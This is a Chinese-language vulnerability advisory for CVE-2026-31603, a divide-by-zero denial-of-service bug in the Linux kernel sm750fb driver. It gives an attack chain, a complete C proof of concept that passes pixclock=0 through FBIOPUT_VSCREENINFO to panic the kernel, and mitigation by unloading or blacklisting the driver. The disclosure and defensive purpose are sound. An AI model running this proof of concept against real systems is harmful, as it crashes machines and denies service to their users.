CVE-2026-31603 CVSS 5.5 中危

CVE-2026-31603 Linux内核sm750fb驱动除零漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31603

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的staging sm750fb驱动程序存在一个除以零漏洞。该漏洞源于`ps_to_hz()`函数在`hw_sm750_crtc_set_mode()`调用时未验证`pixclock`参数是否为零。攻击者可以通过`FBIOPUT_VSCREENINFO`系统调用传递零值`pixclock`触发该漏洞，导致内核崩溃及系统拒绝服务。

技术细节

该漏洞存在于Linux内核的staging/sm750fb驱动程序中，具体涉及函数`ps_to_hz()`的调用逻辑。在设置CRT控制器模式时，`hw_sm750_crtc_set_mode()`函数会调用`ps_to_hz()`，该函数内部执行除法运算以将像素时钟周期转换为频率（通常是常数除以pixclock）。然而，代码逻辑中缺少了对输入参数`pixclock`的非零校验。攻击者可以通过用户空间的ioctl系统调用接口`FBIOPUT_VSCREENINFO`，传递一个`pixclock`字段为0的`fb_var_screeninfo`结构体。当该请求传递到内核空间并执行上述除法运算时，会触发除以零异常。在内核上下文中，这种异常通常会导致内核恐慌（Kernel Panic），致使系统重启或死机，从而造成拒绝服务。此漏洞利用门槛较低，仅需本地低权限用户即可触发。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的本地低权限访问权限。

STEP 2

步骤2

攻击者打开帧缓冲设备（通常为/dev/fb0），并准备一个struct fb_var_screeninfo结构体。

STEP 3

步骤3

攻击者将该结构体中的pixclock字段设置为0，绕过常规检查。

STEP 4

步骤4

攻击者调用FBIOPUT_VSCREENINFO ioctl系统调用，将恶意数据传递给内核。

STEP 5

步骤5

内核sm750fb驱动的ps_to_hz()函数执行除以零操作，触发异常，导致系统崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <fcntl.h>
#include <linux/fb.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdio.h>

int main() {
    // Open the framebuffer device
    int fd = open("/dev/fb0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open /dev/fb0");
        return 1;
    }

    struct fb_var_screeninfo var_info;
    // Retrieve current screen info to populate the structure
    if (ioctl(fd, FBIOGET_VSCREENINFO, &var_info) < 0) {
        perror("FBIOGET_VSCREENINFO");
        close(fd);
        return 1;
    }

    // Set pixclock to 0 to trigger the division by zero vulnerability
    var_info.pixclock = 0;

    // Trigger the vulnerability via FBIOPUT_VSCREENINFO
    // This may cause a kernel panic (Division by zero)
    printf("Triggering exploit with pixclock=0...\n");
    if (ioctl(fd, FBIOPUT_VSCREENINFO, &var_info) < 0) {
        perror("FBIOPUT_VSCREENINFO");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (sm750fb driver enabled)

防御指南

临时缓解措施

如果无法立即升级内核，可以通过禁用sm750fb驱动模块来缓解风险。使用`rmmod sm750fb`命令卸载模块，或在`/etc/modprobe.d/blacklist.conf`中添加`blacklist sm750fb`以阻止系统加载该驱动。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表